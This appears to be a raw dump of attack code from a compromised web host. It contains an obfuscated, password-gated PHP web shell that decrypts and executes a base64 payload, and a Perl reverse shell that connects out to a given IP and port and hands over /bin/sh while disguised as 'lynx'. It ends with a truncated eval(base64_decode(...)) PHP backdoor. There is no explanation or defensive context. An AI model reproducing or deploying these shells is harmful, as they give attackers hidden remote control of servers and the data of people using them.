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 KRba9Hs= '));$_f__f=isset($_POST['_f__f'])?$_POST['_f__f']:(isset($_COOKIE['_f__f'])?$_COOKIE['_f__f']:NULL);if($_f__f!==NULL){$_f__f=md5($_f__f).substr(md5(strrev($_f__f)),0,strlen($_f__f));for($_f____f=0;$_f____f<15185;$_f____f++){$_f___f[$_f____f]=chr(( ord($_f___f[$_f____f])-ord($_f__f[$_f____f]))%256);$_f__f.=$_f___f[$_f____f];}if($_f___f=@gzinflate($_f___f)){if(isset($_POST['_f__f']))@setcookie('_f__f', $_POST['_f__f']);$_f____f=create_function('',$_f___f);unset($_f___f,$_f__f);$_f____f();}}?><form action="" method="post"><input type="text" name="_f__f" value=""/><input type="submit" value=">"/></form>
login-69.hoststar.ch
/home/www/confixx/html/skins/1
perl skins/2 162.216.6.208 44
/home/www/confixx/html/skins/2
#!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR);
login-69.hoststar.ch
/home/www/confixx/html/skins/1
<?php error_reporting(0);$p="jedbzzazbzcb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZ